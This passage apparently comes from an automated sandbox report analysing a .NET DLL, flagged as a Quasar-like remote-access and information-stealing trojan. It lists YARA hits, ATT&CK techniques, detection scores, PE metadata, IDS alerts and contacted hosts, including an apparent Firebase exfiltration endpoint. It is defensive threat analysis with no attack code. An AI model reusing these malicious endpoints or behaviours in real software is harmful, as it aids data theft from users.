                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: vstdlib_s64.dll.dll, type: SAMPLE
Source: Yara match | File source: 10.2.rundll32.exe.18eb8a10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.21a9fe10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.2371efb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.17cca230000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.1dbf6fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.168e3950000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.1da7abe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.21ef74e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.1ab44df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.1d941d40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2113b830000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.1d6442d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.1b080df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.20fedbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.1edd23b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.13ffd190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.2b1acfd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR

                        Remote Access Functionality

MITRE ATT&CK Matrix (one tactic column of the original matrix per line; techniques are listed in matrix row order, and a number in parentheses is the match count shown beside that technique):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: Windows Management Instrumentation | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: DLL Side-Loading (1) | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: Process Injection (112) | DLL Side-Loading (1) | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: Masquerading (11) | Disable or Modify Tools (1) | Virtualization/Sandbox Evasion (21) | Process Injection (112) | Obfuscated Files or Information (1) | Rundll32 (1) | DLL Side-Loading (1)
Credential Access: Input Capture (1) | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: Process Discovery (1) | Virtualization/Sandbox Evasion (21) | Application Window Discovery (1) | System Network Configuration Discovery (1) | System Information Discovery (12) | Wi-Fi Discovery | Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: Input Capture (1) | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: Encrypted Channel (1) | Ingress Tool Transfer (1) | Non-Application Layer Protocol (3) | Application Layer Protocol (14) | Fallback Channels | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Antivirus and machine learning detection

Source: vstdlib_s64.dll.dll | Detection: 26% | Scanner: ReversingLabs | Label: ByteCode-MSIL.Trojan.Zilla
Source: vstdlib_s64.dll.dll | Detection: 100% | Scanner: Joe Sandbox ML
No Antivirus matches

Source: http://telize.com/geoip | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: https://argentina-e4162-default-rtdb.firebaseio.com/user.json | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://api.ipify.org/ | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://freegeoip.net/xml/ | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: https://www.telize.com/geoip | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Domains

Name: telize.com | IP: 88.198.193.213 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
Name: www.telize.com | IP: 88.198.193.213 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
Name: api.ipify.org | IP: 104.26.12.205 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
Name: freegeoip.net | IP: 3.33.130.190 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
Name: argentina-e4162-default-rtdb.firebaseio.com | IP: 34.120.206.254 | Active: true | Malicious: false | Antivirus Detection: none | Reputation: unknown
URLs

Name: http://api.ipify.org/ | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: http://freegeoip.net/xml/ | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: https://argentina-e4162-default-rtdb.firebaseio.com/user.json | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: http://telize.com/geoip | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: https://www.telize.com/geoip | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
IPs

IP: 104.26.12.205 | Domain: api.ipify.org | Country: United States | ASN: 13335 | ASN Name: CLOUDFLARENETUS | Malicious: true
IP: 88.198.193.213 | Domain: telize.com | Country: Germany | ASN: 24940 | ASN Name: HETZNER-ASDE | Malicious: true
IP: 3.33.130.190 | Domain: freegeoip.net | Country: United States | ASN: 8987 | ASN Name: AMAZONEXPANSIONGB | Malicious: true
IP: 34.120.206.254 | Domain: argentina-e4162-default-rtdb.firebaseio.com | Country: United States | ASN: 15169 | ASN Name: GOOGLEUS | Malicious: false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1473780
Start date and time: 2024-07-15 21:17:36 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: vstdlib_s64.dll.dll (renamed because the original name is a hash value)
Original Sample Name: vstdlib_s64.dll.exe
Detection: MAL
Classification: mal80.troj.spyw.evad.winDLL@38/2@5/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .dll
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: vstdlib_s64.dll.dll
Time: 15:19:24 | Type: API Interceptor | Description: 3996151x Sleep call for process: rundll32.exe modified
                                  o82ktPixLt.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  gQzJjvCHZV.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  DCAbo3D46k.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  wkvH2q7DNh.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  54328bd36c14bd82ddaa0c04b25ed9ad6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rDoc_87993766478.exeGet hashmaliciousLokibotBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rTNT__consignmentnumber__87993766478.exeGet hashmaliciousLokibotBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  FVG2-20240704.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  SecuriteInfo.com.Win64.PWSX-gen.3492.24691.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  No context
                                  Process:C:\Windows\System32\rundll32.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):42
                                  Entropy (8bit):4.0050635535766075
                                  Encrypted:false
                                  SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                  MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                  SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                  SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                  SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                  Process:C:\Windows\System32\rundll32.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):10
                                  Entropy (8bit):2.7219280948873625
                                  Encrypted:false
                                  SSDEEP:3:Jw/zn:Szn
                                  MD5:A727C23FB0D2ED884F90288656DE1378
                                  SHA1:7BDF93C8575CA64B179D7316531BFF47F2D06768
                                  SHA-256:58F2795D1156D90EC8057C218D5E53E54A21FE92AF2414D516C5A77B363FDA6B
                                  SHA-512:B2732256B5675E00960DF616CB78D723D886CB0E11C181EB7650CDE30BAE251732EE56F93132A1282DBBD2EF3662674540AFAC08EC98BEB8FBBAF3A5DDD56A28
                                  Malicious:false
                                  Preview:15:07:2024
                                  File type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.1366584226365735
                                  TrID:
                                  • Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                                  • Win64 Dynamic Link Library (generic) (102004/3) 40.63%
                                  • Win64 Executable (generic) Net Framework (21505/4) 8.57%
                                  • Win64 Executable (generic) (12005/4) 4.78%
                                  • Generic Win/DOS Executable (2004/3) 0.80%
                                  File name:vstdlib_s64.dll.dll
                                  File size:7'477'096 bytes
                                  MD5:ac7da10e20d625cc463536172d0ac33e
                                  SHA1:c4242194e3faa82506513e2572c160a30082bfb0
                                  SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
                                  SHA512:77f929fa05266793765014b24fede5f0c64f88598f9580a6aaa4d339b428e4a68eacdb4dc0cab1f1c428f870c57ac54e55423f8fbbe80fd1a48ac54442f1787a
                                  SSDEEP:24576:KxClp92/e9DlZ62nbFSu28jugkg91tVWwS+pvbOOmwWYhssXfKySQN1jk1eI8ykJ:h0bz0nbb
                                  TLSH:8976324CE43A95D8CD4672F0AC96198C39855DD89FBD572A042CC0B827EB6BC42877FE
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f.f.........." ......q.........f.q.. ........... .......................`r...........@...@......@............... .....
                                  Icon Hash:7ae282899bbab082
                                  Entrypoint:0x18071fd66
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x180000000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6685668E [Wed Jul 3 14:56:14 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:dae02f32a21e03ce65412f6e56942daa
                                  Signature Valid:false
                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 07/10/2021 01:00:00 10/10/2024 00:59:59
                                  Subject Chain
                                  • CN=Valve Corp., O=Valve Corp., L=Bellevue, S=Washington, C=US
                                  Version:3
                                  Thumbprint MD5:83896ECC20DB9E84A1A1D6D5B5B15A5D
                                  Thumbprint SHA-1:935767D66FAD4AD2D1F03A095C49370DC74DF607
                                  Thumbprint SHA-256:E98CCA8343960798A47BDB3CDD319DB4B9C6DBD8BC7574C13F6C09A925AEC0E9
                                  Serial:0689B3BCEB4409890A32D71976B132A4
                                  Instruction
                                  dec eax
                                  mov eax, dword ptr [80002000h]
                                  add dword ptr [eax], eax
                                  add byte ptr [eax], al
                                  jmp eax
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x720068         0x28          .sdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x71fd10         0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x722000         0x33c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x71ea00         0x2d68
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x724000         0x30          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x10          .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2010           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type           Entropy             Characteristics
.text   0x2000           0x71dd72      0x71de00  4d64ab768b4471f4dad807114cfa4605  unknown   unknown          unknown             unknown             IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata  0x720000         0x1e3         0x200     205f35db0c4d7d485e9c66117be0b622  False     0.587890625      OpenPGP Public Key  4.531194460208676   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x722000         0x33c         0x400     9e217ba6f8b9f646b6164e424d8a3a34  False     0.341796875      data                2.6099876523576393  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x724000         0x30          0x200     4d5f1334246aa8d607d9db9127b03f3b  False     0.115234375      data                0.5919266160963527  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        RVA       Size   Type  Language  Country  ZLIB Complexity
RT_VERSION  0x722058  0x2e4  data                     0.4297297297297297
DLL          Import
mscoree.dll  _CorDllMain
Name                  Ordinal  Address
V_FixDoubleSlashes    0        0x180002122
V_FixSlashes          1        0x1800020d2
V_IsAbsolutePath      2        0x180002112
V_RemoveDotSlashes    3        0x180002102
V_StripLastDir        4        0x1800020c2
V_StripTrailingSlash  5        0x1800020b2
V_UTF16ToUTF8         6        0x1800020a2
V_UTF8ToUTF16         7        0x180002092
V_snprintf            8        0x180002062
V_strncat             9        0x180002082
V_strncat_length      10       0x1800020f2
V_strncpy             11       0x1800020e2
V_vsnwprintf          12       0x180002072
Timestamp                 Protocol  SID      Message                                           Source Port  Dest Port  Source IP    Dest IP
07/15/24-21:07:19.513418  TCP       2814031  ETPRO TROJAN W32/Quasar RAT Connectivity Check    49738        80         192.168.2.4  88.198.193.213
07/15/24-21:07:19.945864  TCP       2814030  ETPRO TROJAN W32/Quasar RAT Connectivity Check 2  49739        80         192.168.2.4  3.33.130.190
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                                         Type            Class        DNS over HTTPS
Jul 15, 2024 21:18:47.173902988 CEST  192.168.2.4  1.1.1.1  0x6e3d    Standard query (0)  argentina-e4162-default-rtdb.firebaseio.com  A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:48.030344963 CEST  192.168.2.4  1.1.1.1  0x4173    Standard query (0)  telize.com                                   A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:48.737186909 CEST  192.168.2.4  1.1.1.1  0xabd9    Standard query (0)  www.telize.com                               A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:50.735013008 CEST  192.168.2.4  1.1.1.1  0x6261    Standard query (0)  freegeoip.net                                A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:52.143435955 CEST  192.168.2.4  1.1.1.1  0x54d     Standard query (0)  api.ipify.org                                A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                                         CName  Address         Type            Class        DNS over HTTPS
Jul 15, 2024 21:18:47.195360899 CEST  1.1.1.1    192.168.2.4  0x6e3d    No error (0)  argentina-e4162-default-rtdb.firebaseio.com         34.120.206.254  A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:47.195360899 CEST  1.1.1.1    192.168.2.4  0x6e3d    No error (0)  argentina-e4162-default-rtdb.firebaseio.com         35.190.39.113   A (IP address)  IN (0x0001)  false
